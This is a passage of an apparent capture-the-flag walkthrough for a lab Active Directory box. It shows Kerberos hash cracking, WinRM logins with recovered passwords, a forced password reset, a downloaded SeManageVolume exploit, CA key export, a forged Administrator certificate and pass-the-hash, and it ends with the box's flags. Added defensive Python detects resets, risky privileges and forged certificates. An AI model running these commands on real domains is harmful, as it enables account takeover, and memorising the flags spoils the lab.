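# Copied from the first $NETNTLMv2$ line above: bytes 69CFF1DA922EDB01 read little-endian,
# and the 8-byte client nonce that follows them.
TIMESTAMP_FT = 0x01DB2E92DAF1CF69
CLIENT_CHALLENGE = bytes.fromhex("59C89DCA95B2D6B2")

# Constructed AV_PAIR list mirroring what the DC advertises in the captured blobs.
SAMPLE_BLOB = build_ntlmv2_blob(TIMESTAMP_FT, CLIENT_CHALLENGE, [
    (2, utf16("CERTIFICATE")),             # MsvAvNbDomainName
    (1, utf16("DC01")),                    # MsvAvNbComputerName
    (4, utf16("certificate.htb")),         # MsvAvDnsDomainName
    (3, utf16("DC01.certificate.htb")),    # MsvAvDnsComputerName
    (7, struct.pack("<Q", TIMESTAMP_FT)),  # MsvAvTimestamp
    (6, struct.pack("<I", 2)),             # MsvAvFlags: 0x2 = client included a MIC
    (10, b"\x00" * 16),                    # MsvAvChannelBindings: all zero = no CBT
    (9, utf16("cifs/DC01")),               # MsvAvTargetName: SPN the client asked for
])


def demo_hashcat_line():
    # Placeholder server challenge and NTProofStr; user/domain as the post identifies them.
    return hashcat_5600("Administrator", "WS-01", bytes.fromhex("1122334455667788"),
                        bytes.fromhex("00" * 16), SAMPLE_BLOB)


if __name__ == "__main__":
    ts, nonce, pairs = parse_ntlmv2_blob(SAMPLE_BLOB)
    print("timestamp:", ts.isoformat(), " client nonce:", nonce.hex())
    for name, value in pairs.items():
        print(f"  {name:22} {value}")
    print(demo_hashcat_line())
```

What a practitioner reads off the decoded pairs: MsvAvTimestamp dates the capture (the first hash above decodes to 2024-11-04 UTC), MsvAvFlags with bit 0x2 set means the client sent a MIC, and MsvAvTargetName together with an all-zero MsvAvChannelBindings tells you whether a relay of this authentication to a different service would have been stopped by SPN validation or by channel binding.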


$krb5pa$18$Lion.SK$CERTIFICATE$CERTIFICATE.HTBLion.SK$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0

lion_as-req.txt

john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 lion_as-req.txt
Cracked!

$krb5asrep$18$CERTIFICATE.HTBLion.SK$7a4181856efd330c4003a769$…

lion_as-rep.txt

john --wordlist=~/Pentest/WordLists/rockyou.txt --fork=4 lion_as-rep.txt

❌ Again, no luck cracking this one with the rockyou.txt word list.



Verify the Credential

Excellent! We've found another credential.
We can WinRM with this credential and possibly uncover more
Just happens to be one of the Domain CRA Managers users as well



WinRM as Lion.SK

evil-winrm -i DC01.certificate.htb -u 'lion.SK' -p '!QAZ2wsx'
ℹ️
Nothing too interesting from a local privilege escalation perspective when perusing the file system as this user.



BloodHound Data

This is almost certainly the path we're going to pursue
💡
This is almost certainly looking like an AD CS abuse scenario -- especially when considering the name of the box. I am going to run certipy-ad as Lion.SK to get a better view of the attack surface.
certipy-ad find -vulnerable -u 'lion.sk' -p '!QAZ2wsx' -dc-host DC01.certificate.htb -text

20250606154607_Certipy.txt

Certificate Authorities
  0
    CA Name                             : Certificate-LTD-CA
    DNS Name                            : DC01.certificate.htb
    Certificate Subject                 : CN=Certificate-LTD-CA, DC=certificate, DC=htb
    Certificate Serial Number           : 75B2F4BBF31F108945147B466131BDCA
    Certificate Validity Start          : 2024-11-03 22:55:09+00:00
    Certificate Validity End            : 2034-11-03 23:05:09+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFICATE.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        ManageCertificates              : CERTIFICATE.HTB\Administrators
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Enroll                          : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : Delegated-CRA
    Display Name                        : Delegated-CRA
    Certificate Authorities             : Certificate-LTD-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectAltRequireEmail
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-05T19:52:09+00:00
    Template Last Modified              : 2024-11-05T19:52:10+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFICATE.HTB\Domain CRA Managers
                                          CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFICATE.HTB\Administrator
        Full Control Principals         : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFICATE.HTB\Domain Admins
                                          CERTIFICATE.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFICATE.HTB\Domain CRA Managers
    [!] Vulnerabilities
      ESC3                              : Template has Certificate Request Agent EKU set.
After some attempts to exploit this template, I did some research and ran certutil -v -template 'Delegated-CRA' on the box via WinRM. This was definitely a rabbit hole.

Passing this through ChatGPT, I found that this template is not a good candidate for either ESC3, because we cannot specify arbitrary names when requesting a certificate, or ESC6, because the certificates issued on behalf of other users cannot be used for authentication purposes.



Lateral to Ryan.K

Abuse GenericAll to Change Password

Sara.B is in the Account Operators group, which has extensive DACL rights over a huge swath of users, including Ryan.K. I am interested in his WinRM access to see what he can reach, since he is the sole member of the Domain Storage Managers group.

net rpc user password 'Ryan.K' 'P@$$word123!' -U "CERTIFICATE.HTB"/"Sara.B"%'Blink182' -S "DC01.certificate.htb"

Change Ryan.K's password to P@$$word123!
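Account Operators membership is a standing ability to reset passwords across most of the domain, so the useful defender signal is the reset itself: Security event 4724 records the resetting account under Subject and the victim under Target Account. The Python below is an added example, not part of the original write-up; it triages constructed 4724 message bodies against a constructed allow-list of approved resetters and a constructed map of sensitive targets (Ryan.K is sensitive here because of his Domain Storage Managers membership). The event text, SIDs and policy names are assumptions, not values captured from the box.

```python
import re
from dataclasses import dataclass

# Constructed sample messages in the shape of Windows Security event 4724
# ("An attempt was made to reset an account's password"). Not captured from
# the box; the first one mirrors the walkthrough's Sara.B -> Ryan.K reset.
SAMPLE_4724_EVENTS = [
    "An attempt was made to reset an account's password.\n\n"
    "Subject:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1104\n"
    "\tAccount Name:\t\tSara.B\n\tAccount Domain:\t\tCERTIFICATE\n\tLogon ID:\t\t0x1A2B3C\n\n"
    "Target Account:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1105\n"
    "\tAccount Name:\t\tRyan.K\n\tAccount Domain:\t\tCERTIFICATE",
    # Constructed: an allow-listed helpdesk account resetting an ordinary user
    "An attempt was made to reset an account's password.\n\n"
    "Subject:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1300\n"
    "\tAccount Name:\t\thelpdesk.svc\n\tAccount Domain:\t\tCERTIFICATE\n\tLogon ID:\t\t0x2B3C4D\n\n"
    "Target Account:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1200\n"
    "\tAccount Name:\t\tjane.doe\n\tAccount Domain:\t\tCERTIFICATE",
    # Constructed: an unlisted user resetting another ordinary user
    "An attempt was made to reset an account's password.\n\n"
    "Subject:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1201\n"
    "\tAccount Name:\t\tjohn.smith\n\tAccount Domain:\t\tCERTIFICATE\n\tLogon ID:\t\t0x3C4D5E\n\n"
    "Target Account:\n\tSecurity ID:\t\tS-1-5-21-1111111111-2222222222-3333333333-1200\n"
    "\tAccount Name:\t\tjane.doe\n\tAccount Domain:\t\tCERTIFICATE",
]

# Constructed policy: accounts allowed to reset other people's passwords, and
# targets that are sensitive because of what their group membership grants.
APPROVED_RESETTERS = {"helpdesk.svc"}
PRIVILEGED_ACCOUNTS = {
    "ryan.k": "Domain Storage Managers",   # holds SeManageVolumePrivilege on the box
    "administrator": "Domain Admins",
}


@dataclass(frozen=True)
class PasswordReset:
    subject: str   # who performed the reset
    target: str    # whose password was reset


def parse_4724(message: str) -> PasswordReset:
    """Extract the Subject and Target Account names from a 4724 message body."""
    subject_part, sep, target_part = message.partition("Target Account:")
    if not sep:
        raise ValueError("not a 4724 message: no 'Target Account:' section")
    subject = re.search(r"Account Name:\s*(\S+)", subject_part).group(1)
    target = re.search(r"Account Name:\s*(\S+)", target_part).group(1)
    return PasswordReset(subject=subject, target=target)


def triage(reset: PasswordReset) -> str:
    """Rate a reset: 'self', 'expected', 'high' (sensitive target) or 'review'."""
    subject, target = reset.subject.lower(), reset.target.lower()
    if subject == target:
        return "self"
    if subject in APPROVED_RESETTERS:
        return "expected"
    if target in PRIVILEGED_ACCOUNTS:
        return "high"
    return "review"


def triage_all(messages: list[str]) -> list[tuple[str, str, str]]:
    """Return (subject, target, rating) for every 4724 message."""
    return [(r.subject, r.target, triage(r)) for r in map(parse_4724, messages)]


if __name__ == "__main__":
    for subject, target, rating in triage_all(SAMPLE_4724_EVENTS):
        group = PRIVILEGED_ACCOUNTS.get(target.lower(), "")
        print(f"[{rating:8}] {subject} reset {target}" + (f" ({group})" if group else ""))
```

The allow-list and the sensitive-account map are the parts that need real data: populate them from your delegation model and from group memberships, and pair the alert with a 4738 (account changed) or 4624 (logon) from the victim shortly afterwards to confirm the reset was actually used.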


WinRM as Ryan.K

evil-winrm -i DC01.certificate.htb -u Ryan.K -p 'P@$$word123!'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ =======
SeMachineAccountPrivilege     Add workstations to domain       Enabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Enabled

whoami /all output -- SeManageVolumePrivilege is almost certainly related to being in the Domain Storage Managers group

Release SeManageVolumeExploit · CsEnox/SeManageVolumeExploit

There's a pre-compiled exploit here for the original published by xct (don't use pre-compiled exploits in a client environment)

This exploit grants full permission on C:\ drive for all users on the machine.

Enables the privilege in the token

Creates handle to \\.\C: with SYNCHRONIZE | FILE_TRAVERSE

Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545
wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> upload SeManageVolumeExploit.exe
& .\SeManageVolumeExploit.exe
From here, we've opened the entire C:\ volume to all users on the system and we can technically escalate our privilege by reading the C:\Users\Administrator directory or by overwriting a system .dll.

But, I'll stick to the current theme of the box and exploit permissions by exporting the CA key to forge certificates at will.
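SeManageVolumePrivilege is the real prize in that whoami output: a holder can open the raw volume and rewrite security descriptors with FSCTL_SD_GLOBAL_CHANGE, which is exactly what the exploit above does, so the defender's check is to audit who holds it before anyone does. The Python below is an added example, not code from the original post or from the exploit's repository. It parses a constructed excerpt of a secedit /export result and reports holders outside a constructed baseline; the extra SID stands in for a custom group like Domain Storage Managers and is a placeholder, not a value from the box.

```python
import re

# Constructed excerpt of `secedit /export /cfg <file>` output. The real file is
# UTF-16 on disk (open it with encoding="utf-16"); here it is an inline str.
# The second SID on SeManageVolumePrivilege is a placeholder for a custom group.
SAMPLE_SECEDIT_EXPORT = """[Unicode]
Unicode=yes
[Privilege Rights]
SeManageVolumePrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1107
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
SeChangeNotifyPrivilege = *S-1-1-0,*S-1-5-32-544,*S-1-5-32-545,*S-1-5-32-551
SeTakeOwnershipPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed baseline for privileges that bypass file ACLs or touch raw volumes.
# Tune it to your own domain policy; these are the common member-server defaults.
BASELINE = {
    "SeManageVolumePrivilege": {"S-1-5-32-544"},               # Administrators only
    "SeBackupPrivilege": {"S-1-5-32-544", "S-1-5-32-551"},     # + Backup Operators
    "SeRestorePrivilege": {"S-1-5-32-544", "S-1-5-32-551"},
    "SeTakeOwnershipPrivilege": {"S-1-5-32-544"},
}

WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-551": "BUILTIN\\Backup Operators",
}


def parse_privilege_rights(text: str) -> dict[str, set[str]]:
    """Return {privilege: {holder, ...}} from the [Privilege Rights] section."""
    rights: dict[str, set[str]] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line == "[Privilege Rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Holders are '*SID' tokens (or bare names); drop the leading '*'.
        rights[name.strip()] = {
            tok.strip().lstrip("*") for tok in value.split(",") if tok.strip()
        }
    return rights


def unexpected_holders(rights: dict[str, set[str]],
                       baseline: dict[str, set[str]] = BASELINE) -> dict[str, set[str]]:
    """Holders of each baselined privilege that the baseline does not allow."""
    findings = {}
    for priv, allowed in baseline.items():
        extra = rights.get(priv, set()) - allowed
        if extra:
            findings[priv] = extra
    return findings


def describe(sid: str) -> str:
    """Friendly name for well-known SIDs; domain SIDs are returned unchanged."""
    return WELL_KNOWN_SIDS.get(sid, sid)


if __name__ == "__main__":
    findings = unexpected_holders(parse_privilege_rights(SAMPLE_SECEDIT_EXPORT))
    for priv, holders in findings.items():
        print(f"{priv}: unexpected holders -> {', '.join(map(describe, sorted(holders)))}")
```

Domain SIDs in the findings still need resolving against AD to see which group they are; on the box that lookup would land on Domain Storage Managers. Run the audit against the effective policy on domain controllers separately, since their defaults differ from member servers.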



Becoming Domain Admin

Export the CA Key

& .\SeManageVolumeExploit.exe

Re-run the exploit

certutil -exportPFX my 'Certificate-LTD-CA' .\pwn.pfx

Export the CA key to a local .pfx file

*Evil-WinRM* PS C:\Users\Ryan.K\Documents> download pwn.pfx



Forge a User Certificate

certipy-ad forge -ca-pfx pwn.pfx -upn 'administrator@certificate.htb' -subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' -out administrator.pfx

Create the certificate with the user authentication details

faketime certipy-ad auth -pfx administrator.pfx -dc-ip '10.129.236.230' -username 'Administrator' -domain 'certificate.htb'

Using faketime with the wrapper function to get a TGT and the NT hash



Pass the Admin NT Hash

evil-winrm -i DC01.certificate.htb -u 'Administrator' -H 'd804304519bf0143c14cbf1c024408c6'
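A certificate forged with the CA's private key looks legitimate to the DC, but the CA never issued it, so its serial number has no row in the CA database. Kerberos event 4768 includes a Certificate Information block (issuer, serial, thumbprint) when the client authenticated with a certificate, and correlating that serial against an export of issued serials exposes the forgery. The Python below is an added example, not code from the write-up or from certipy; the issued-serial list, the 4768 bodies and the account names are constructed, and only the CA name comes from the certipy output above.

```python
import re

CA_NAME = "Certificate-LTD-CA"  # the box's enterprise CA, from the certipy output

# Constructed: serial numbers the CA actually issued, as exported from the CA
# database (e.g. with certutil -view). Not values from the box.
ISSUED_SERIALS = {
    "1a0000000f9f2d3c4b5a6978870000000f",
    "1a0000001ccafe00112233445500000010",
}

# Constructed 4768 message bodies. Certificate Information is only present for
# PKINIT (certificate-based) logons, so its absence is not itself suspicious.
SAMPLE_4768_EVENTS = [
    # Legitimate PKINIT logon with a CA-issued certificate (serial in upper case)
    "A Kerberos authentication ticket (TGT) was requested.\n\n"
    "Account Information:\n\tAccount Name:\t\tjane.doe\n\tSupplied Realm Name:\tCERTIFICATE.HTB\n\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tCertificate-LTD-CA\n"
    "\tCertificate Serial Number:\t1A0000000F9F2D3C4B5A6978870000000F\n"
    "\tCertificate Thumbprint:\t\t0000000000000000000000000000000000000000",
    # Certificate chaining to our CA whose serial the CA never issued
    "A Kerberos authentication ticket (TGT) was requested.\n\n"
    "Account Information:\n\tAccount Name:\t\tAdministrator\n\tSupplied Realm Name:\tCERTIFICATE.HTB\n\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tCertificate-LTD-CA\n"
    "\tCertificate Serial Number:\t6f2d9c1e4b7a8d3f5c0e1a2b3c4d5e6f\n"
    "\tCertificate Thumbprint:\t\t1111111111111111111111111111111111111111",
    # Ordinary password-based TGT request: no Certificate Information at all
    "A Kerberos authentication ticket (TGT) was requested.\n\n"
    "Account Information:\n\tAccount Name:\t\tjohn.smith\n\tSupplied Realm Name:\tCERTIFICATE.HTB\n\n"
    "Additional Information:\n\tPre-Authentication Type:\t2",
    # Certificate from a CA that is not ours
    "A Kerberos authentication ticket (TGT) was requested.\n\n"
    "Account Information:\n\tAccount Name:\t\tsvc_app\n\tSupplied Realm Name:\tCERTIFICATE.HTB\n\n"
    "Certificate Information:\n\tCertificate Issuer Name:\t\tContoso-Issuing-CA\n"
    "\tCertificate Serial Number:\t0b00aa55\n"
    "\tCertificate Thumbprint:\t\t2222222222222222222222222222222222222222",
]


def normalize_serial(serial: str) -> str:
    """Lower-case hex with separators and leading zeros removed, so that the
    event log's rendering and the CA database export compare equal."""
    hexdigits = re.sub(r"[^0-9a-fA-F]", "", serial).lower()
    return hexdigits.lstrip("0") or "0"


def classify(message: str, issued: set[str] = ISSUED_SERIALS,
             ca_name: str = CA_NAME) -> tuple[str, str]:
    """Return (account, verdict) for one 4768 message body."""
    account = re.search(r"Account Name:\s*(\S+)", message).group(1)
    issuer = re.search(r"Certificate Issuer Name:\s*([^\n]+)", message)
    serial = re.search(r"Certificate Serial Number:\s*(\S+)", message)
    if not issuer or not serial:
        return account, "password-or-key-based"
    if issuer.group(1).strip() != ca_name:
        return account, "foreign-issuer"
    known = {normalize_serial(s) for s in issued}
    if normalize_serial(serial.group(1)) in known:
        return account, "issued-by-ca"
    # Chains to our CA, yet the CA has no record of issuing it.
    return account, "forged-or-unlogged"


def classify_all(messages: list[str]) -> list[tuple[str, str]]:
    return [classify(m) for m in messages]


if __name__ == "__main__":
    for account, verdict in classify_all(SAMPLE_4768_EVENTS):
        print(f"{verdict:22} {account}")
```

A "forged-or-unlogged" verdict for a Tier-0 account such as Administrator is the golden-certificate signature; the CA database export must be fresh, or recently issued legitimate certificates will also trip it. Once the CA key has left the box the way it does here, detection is a stopgap: the durable fix is to rekey or replace the CA and reissue.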



Flags

User

cfaf4119656ad942917f09f8f4b3070f    

Root

eb541018197e6166dd4ff0495ba1c026    